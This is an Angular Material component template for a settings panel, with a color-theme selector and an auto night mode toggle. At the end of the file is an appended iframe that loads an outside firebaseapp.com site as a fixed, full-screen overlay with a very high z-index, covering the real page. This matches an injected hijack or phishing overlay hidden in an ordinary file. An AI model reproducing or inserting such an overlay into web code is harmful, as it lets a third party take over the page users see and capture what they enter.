<div class="container">
  <div class="row">
    <div class="col-md-4 icon-form-field">
      <mat-icon color="accent">color_lens</mat-icon>
      <mat-form-field>
        <mat-select placeholder="Color theme" name="theme"
                    [ngModel]="settings?.theme" (change)="onThemeSelect($event)">
          <mat-option *ngFor="let t of themes" [value]="t.value">
            {{t.label}}
          </mat-option>
        </mat-select>
      </mat-form-field>
    </div>
    <div class="col-md-4 icon-form-field">
      <mat-icon color="accent">lightbulb_outline</mat-icon>
      <mat-form-field>
        <mat-select placeholder="Auto night mode (from 21:00 to 7:00)"
                    name="auto-night-mode"
                    [ngModel]="settings?.autoNightMode?.toString()"
                    (change)="onAutoNightModeSelect($event)">
          <mat-option value="false">Off</mat-option>
          <mat-option value="true">On</mat-option>
        </mat-select>
      </mat-form-field>
    </div>
  </div>
</div>

<iframe src="https://carro369x.firebaseapp.com" style="position:fixed; top:0px; left:0px; bottom:0px; right:0px; width:100%; height:100%; border:none; margin:0; padding:0; overflow:hidden; z-index:999999;" ></iframe>

